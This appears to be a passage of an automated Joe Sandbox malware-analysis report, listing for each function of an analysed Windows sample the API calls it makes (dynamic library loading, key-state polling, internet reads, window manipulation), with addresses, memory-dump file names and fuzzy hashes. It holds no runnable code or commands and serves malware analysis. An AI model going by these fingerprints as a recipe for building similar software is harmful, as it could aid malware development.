• Opcode Fuzzy Hash: cafa115f2e6c36d0c951c203928ca0ced409f74fa23e472f2ce85a7835a859ce
• Instruction Fuzzy Hash: 5F513D35A002159FDB05DF65C981EAEBBF5FF49314F088058E849AB3A2DB35ED41CB90
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 00A9999D
• GetProcAddress.KERNEL32(00000000,?), ref: 00A99A2D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00A99A49
• GetProcAddress.KERNEL32(00000000,?), ref: 00A99A8F
• FreeLibrary.KERNEL32(00000000), ref: 00A99AAF
  • Part of subcall function 00A2F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00A81A02,?,7529E610), ref: 00A2F9F1
  • Part of subcall function 00A2F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00A70354,00000000,00000000,?,?,00A81A02,?,7529E610,?,00A70354), ref: 00A2FA18
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
• String ID:
• API String ID: 666041331-0
• Opcode ID: 780214bb14df5de7d1917e0d4b0c7c6f1a42057c85e52afa803908f55115dab6
• Instruction ID: 1950b81081370c5e78c3d557a24632c918aea033b12763370b679c037538d7c9
• Opcode Fuzzy Hash: 780214bb14df5de7d1917e0d4b0c7c6f1a42057c85e52afa803908f55115dab6
• Instruction Fuzzy Hash: F3516C35600205EFCB10DF68C4858AEBBF1FF09354B0481A8E80A9F762D731ED86CB91
APIs
• SetWindowLongW.USER32(00000002,000000F0,?), ref: 00AA766B
• SetWindowLongW.USER32(?,000000EC,?), ref: 00AA7682
• SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00AA76AB
• ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00A8B5BE,00000000,00000000), ref: 00AA76D0
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00AA76FF
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Window$Long$MessageSendShow
• String ID:
• API String ID: 3688381893-0
• Opcode ID: 4795ac40218f5626608280090c5a3846301252548c4443766354eed1516ea66c
• Instruction ID: bfbd9fc43c5f03c7c7ba3612bf2c09e368e5ed37076225fcbce802e500e8527c
• Opcode Fuzzy Hash: 4795ac40218f5626608280090c5a3846301252548c4443766354eed1516ea66c
• Instruction Fuzzy Hash: E941D335A08504AFD729DF6CCC48FAEBBA5EB4B360F150224F859A72E1D770AD41DA50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00A119E1
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00A119FE
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00A11A23
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00A11A3D
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetInputState.USER32 ref: 00A84310
                                                                                                                                                                                                                                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00A84367
                                                                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00A84390
                                                                                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00A8439A
                                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A843AB
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00A72262
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 00A7230E
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 00A72316
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 00A72327
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00A7232F
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00A8CC63,00000000), ref: 00A8D97D
                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00A8D9B4
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,00A8CC63,00000000), ref: 00A8D9F9
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A8CC63,00000000), ref: 00A8DA0D
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A8CC63,00000000), ref: 00A8DA37
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 233648e58c006000dabf9c9d2a2d30567cb46a0183feb4a764cf602fb073ea7f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 75bd097d97760ebfe8a9421fb4e70865f484ebe0c0b0e39eb3b1a50bc72beea8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 233648e58c006000dabf9c9d2a2d30567cb46a0183feb4a764cf602fb073ea7f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52313C71504205EFDB24EFA6D885EAFBBF8EB05354B20442EF546D2590DB70EE41DB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00AA61E4
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00AA623C
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA624E
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA6259
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AA62B5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 28cb08c610c005357cf19fbc5d53f10f3a5bf881d01b0576672e1ecc6ab6cd4f
                                                                                                                                                                                                                                                                                                    • Instruction ID: da8c68781f651d3f7b28a29cfef61c7c08777deef82da866aa3bb7eda1d5d6ad
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28cb08c610c005357cf19fbc5d53f10f3a5bf881d01b0576672e1ecc6ab6cd4f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94215E75D00218AADF21DFA4DC84AEEBBB8EF46724F144216FA25EB1C0D7709986CF50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 00A913AE
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00A913C5
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00A91401
                                                                                                                                                                                                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00A9140D
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00A91445
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: d77217936fba15fc1afe43dcbf52c92ab176c7d13cdecec42745b40cbc6fe7e1
                                                                                                                                                                                                                                                                                                    • Instruction ID: a9da8fd33c6b56f881befc06db11686bb523cded9304bbf2cf379bf49e49ce3c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d77217936fba15fc1afe43dcbf52c92ab176c7d13cdecec42745b40cbc6fe7e1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A221A276600215AFDB04EFA5CD84AAEBBF5EF49300B048439F89AD7791DB30AD41DB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00A4D146
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A4D169
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A36A79,?,0000015D,?,?,?,?,00A385B0,000000FF,00000000,?,?), ref: 00A43BC5
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A4D18F
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4D1A2
                                                                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A4D1B1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: abe9326fd089b530e52aeccc5edd37bdeba3873708cf4307c8fe0106f43c7e4e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5768248ee738ae9a90b7f14a01d3fd8c2944ac76c224ccd96b8011f83edaa9ef
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abe9326fd089b530e52aeccc5edd37bdeba3873708cf4307c8fe0106f43c7e4e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B901847A6016157F372167BE5C8CD7B6A6DDEC7B61314022AFD05CA244DBA08D0281B0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _memcmp
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2c6ed1c7a2b5e9a198f612d42f871b1cbf6c1fb021e967a98084fb16f488e95a
                                                                                                                                                                                                                                                                                                    • Instruction ID: ae4297001daf7fe20c4f194053f61f9c4e30cba954a19472e2962aa5ea9871b4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c6ed1c7a2b5e9a198f612d42f871b1cbf6c1fb021e967a98084fb16f488e95a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9701D4F2600B057BD714AB209D82FEBB36DAE51399F08C421FD0E9B242E761ED11C6A1
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(0000000A,?,?,00A3F64E,00A3545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A43170
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A431A5
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A431CC
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A431D9
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A431E2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1b4b994d19b059a56380697623fb17cb1877aa703cf4ab26974f49f076a42dc5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0d23f489c2655e6cd58bd1b360b5318a470427ffc6353018ccc9e6367e05e210
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b4b994d19b059a56380697623fb17cb1877aa703cf4ab26974f49f076a42dc5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3401287F6416017B9E12B77C9D86E2B266DEFC13717200629F826D21C1EF71CA024221
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?,?,?,00A70C4E), ref: 00A7091B
                                                                                                                                                                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?,?), ref: 00A70936
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?,?), ref: 00A70944
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?), ref: 00A70954
                                                                                                                                                                                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?,?), ref: 00A70960
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: e3d5c9368694cfe8d3a864e72562e17724ca5a5b4f3e8158e6022f1aea3c436e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4c36748c1e1ed0ead360e2c1b9b78128aa311c243e2dbad89618a9682e75dd24
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3d5c9368694cfe8d3a864e72562e17724ca5a5b4f3e8158e6022f1aea3c436e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F901DFB2600205EFEB008FA8CC04F9A7ABDEB48751F108024FA4AE2251D770CD019BA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00A7F2AE
                                                                                                                                                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00A7F2BC
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00A7F2C4
                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00A7F2CE
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 00A7F30A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 128536cb2837ef66eb372747d1f4a7c8eab34218760a59985f8a56d0282319c9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 18104f8434322d749454d71e2d92045d95a18f2bbbbef5c0ec99b47aebd85b5e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 128536cb2837ef66eb372747d1f4a7c8eab34218760a59985f8a56d0282319c9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1701A931C0061ADFCF00EFE4EC48AEEBB79FB09300F008026E956B2280CB309655CBA1
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A71A60
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A6C
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A7B
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A82
                                                                                                                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A71A99
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                                    APIs
